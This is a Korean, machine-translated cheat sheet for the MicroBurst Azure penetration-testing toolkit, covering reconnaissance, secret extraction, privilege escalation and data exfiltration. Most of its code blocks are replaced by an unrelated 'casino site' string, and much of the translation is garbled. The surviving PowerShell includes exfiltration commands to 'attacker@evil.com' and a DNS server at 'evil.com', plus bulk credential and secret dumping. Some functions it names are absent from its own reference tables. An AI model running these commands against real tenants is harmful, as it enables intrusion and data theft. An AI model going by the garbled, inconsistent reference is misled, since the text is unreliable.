MicroBurst Azure 보안 테스트 툴킷 열 시트¶
제품정보¶
MicroBurst는 Microsoft Azure 보안을 평가하기위한 NetSPI에 의해 개발 된 PowerShell 스크립트 모음입니다. Azure 서비스 발견, 특권 에스컬레이션, 측면 운동 및 데이터 여과에 대한 도구가 포함되어 있습니다. Azure 침투 테스트를 위한 종합 툴킷.
· ** 보증**: 이 도구는 공인된 침투 테스트 및 보안 평가에만 적용됩니다. 모든 환경에서 사용하기 전에 적절한 권한이 있습니다.
설치하기¶
PowerShell 갤러리 설치¶
카지노사이트
수동 설치¶
카지노사이트
Git 설치¶
카지노사이트
기본 사용¶
모듈 설정¶
카지노사이트
인증현황¶
카지노사이트
명령 참조¶
Reconnaissance 기능¶
Function | Description |
---|---|
Invoke-EnumerateAzureBlobs |
Enumerate Azure storage blobs |
Invoke-EnumerateAzureSubDomains |
Enumerate Azure subdomains |
Get-AzurePasswords |
Extract passwords from Azure resources |
Get-AzureDomainInfo |
Get domain information |
Invoke-AzureRmVmBulkCMD |
Execute commands on multiple VMs |
저장 계정 기능¶
Function | Description |
---|---|
Invoke-EnumerateAzureBlobs |
Find accessible storage blobs |
Get-AzureBlobFiles |
Download files from storage |
Invoke-AzureStorageAccountEnum |
Enumerate storage accounts |
Get-AzureStorageAccountKeys |
Extract storage account keys |
가상 머신 기능¶
Function | Description |
---|---|
Invoke-AzureRmVmBulkCMD |
Bulk command execution |
Get-AzureVMDisk |
Access VM disk information |
Invoke-AzureVMUserDataEnum |
Enumerate VM user data |
Get-AzureVMExtensionSettings |
Get VM extension settings |
Azure 스토리지¶
Blob 스토리지 디스커버리¶
카지노사이트
저장 계정 Enumeration¶
카지노사이트
파일 공유 Enumeration¶
카지노사이트
Subdomain 및 서비스 디스커버리¶
Azure Subdomain 사용¶
카지노사이트
서비스 Discovery¶
카지노사이트
DNS 환경¶
ο 회원 관리
가상 머신 폭발¶
VM 명령 실행¶
카지노사이트
VM 디스크 액세스¶
카지노사이트
VM 연장 폭발¶
카지노사이트
Credential 및 비밀 추출¶
비밀번호 추출¶
카지노사이트
인증서 추출¶
카지노사이트
제품 설명 데이터 추출¶
카지노사이트
데이터베이스 Exploitation¶
SQL 데이터베이스¶
카지노사이트
SQL 데이터베이스 액세스¶
카지노사이트
CosmosDB 폭발¶
오프화이트
웹 신청 Exploitation¶
웹 앱 축소¶
카지노사이트
웹 앱 평가¶
오프화이트
기능 앱 평가¶
카지노사이트
Privilege 확장¶
역할 할당¶
카지노사이트
서비스 Principal 뚱 베어¶
카지노사이트
관리 Identity 폭발¶
카지노사이트
옆 운동¶
크로스 구독 오시는 길¶
카지노사이트
Cross-Tenant 액세스¶
카지노사이트
리소스 그룹 Pivoting¶
```powershell
Enumerate resource groups¶
Get-AzureResourceGroups -SubscriptionId "subscription-id"
Find resources with weak permissions¶
Find-AzureWeakPermissions -ResourceGroupName "rg-name"
Pivot through resource groups¶
Invoke-AzureResourceGroupPivot -SourceRG "source-rg" -TargetRG "target-rg" ```의 경우
자료 Exfiltration¶
대량 데이터 추출¶
```powershell
Extract all accessible data¶
Invoke-AzureBulkDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\"
Extract specific data types¶
Invoke-AzureDataExtraction -DataTypes @("Secrets", "Certificates", "Databases") -OutputPath "C:\Exfiltrated\"
Extract with compression¶
Invoke-AzureDataExtraction -SubscriptionId "subscription-id" -OutputPath "C:\Exfiltrated\" -Compress ```에 대하여
스텔스 Exfiltration¶
```powershell
Exfiltrate via storage account¶
Invoke-AzureStealthExfiltration -Method "StorageAccount" -TargetStorage "exfil-storage"
Exfiltrate via email¶
Invoke-AzureStealthExfiltration -Method "Email" -EmailAddress "attacker@evil.com"
Exfiltrate via DNS¶
Invoke-AzureStealthExfiltration -Method "DNS" -DNSServer "evil.com" ```의 경우
자동화 및 스크립트¶
자동화된 평가 스크립트¶
```powershell
Comprehensive Azure assessment¶
param( [string]\(SubscriptionId, [string]\)OutputPath = "C:\AzureAssessment" )
Create output directory¶
New-Item -ItemType Directory -Path $OutputPath -Force
Authenticate¶
Connect-AzAccount
Set subscription context¶
Set-AzContext -SubscriptionId $SubscriptionId
Enumerate subdomains¶
Write-Host "Enumerating subdomains..." $subdomains = Invoke-EnumerateAzureSubDomains -Base (Get-AzContext).Subscription.Name \(subdomains|Out-File "\)OutputPath\subdomains.txt"
Enumerate storage blobs¶
Write-Host "Enumerating storage blobs..." $blobs = Invoke-EnumerateAzureBlobs -Base (Get-AzContext).Subscription.Name \(blobs|Out-File "\)OutputPath\blobs.txt"
Extract passwords¶
Write-Host "Extracting passwords..." $passwords = Get-AzurePasswords -SubscriptionId $SubscriptionId \(passwords|Export-Csv "\)OutputPath\passwords.csv" -NoTypeInformation
Get VM information¶
Write-Host "Gathering VM information..." $vms = Get-AzVM \(vms|Export-Csv "\)OutputPath\vms.csv" -NoTypeInformation
Generate summary report¶
$summary = @\\{ AssessmentDate = Get-Date SubscriptionId = $SubscriptionId SubdomainsFound = $subdomains.Count BlobsFound = $blobs.Count PasswordsFound = $passwords.Count VMsFound = $vms.Count \\}
\(summary|ConvertTo-Json|Out-File "\)OutputPath\summary.json"
Write-Host "Assessment completed. Results saved to $OutputPath" ```에 대하여
연속 모니터링¶
```powershell
Continuous Azure monitoring¶
param( [int]\(IntervalMinutes = 60, [string]\)LogPath = "C:\AzureMonitoring\monitor.log" )
while ($true) \\{ \(timestamp = Get-Date Write-Output "[\)timestamp] Starting Azure monitoring cycle"|Tee-Object -FilePath $LogPath -Append
try \\\\{
# Check for new storage accounts
$newStorage = Get-AzStorageAccount|Where-Object \\\\{$_.CreationTime -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newStorage) \\\\{
Write-Output "[$timestamp] New storage accounts detected: $($newStorage.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new VMs
$newVMs = Get-AzVM|Where-Object \\\\{$_.TimeCreated -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newVMs) \\\\{
Write-Output "[$timestamp] New VMs detected: $($newVMs.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
# Check for new role assignments
$newRoles = Get-AzRoleAssignment|Where-Object \\\\{$_.CreatedOn -gt (Get-Date).AddMinutes(-$IntervalMinutes)\\\\}
if ($newRoles) \\\\{
Write-Output "[$timestamp] New role assignments detected: $($newRoles.Count)"|Tee-Object -FilePath $LogPath -Append
\\\\}
\\\\}
catch \\\\{
Write-Output "[$timestamp] Error during monitoring: $($_.Exception.Message)"|Tee-Object -FilePath $LogPath -Append
\\\\}
Start-Sleep -Seconds ($IntervalMinutes * 60)
\\} ```의 경우
문제 해결¶
인증 문제¶
카지노사이트
모듈 문제¶
카지노사이트
제출 문제¶
카지노사이트
다른 도구와 통합¶
BloodHound 통합¶
카지노사이트
Metasploit 통합¶
카지노사이트
지원하다¶
*이 속임수 시트는 MicroBurst를 사용하여 포괄적 인 참조를 제공합니다. 항상 Azure 보안 평가를 수행하기 전에 적절한 권한이 있습니다. *필수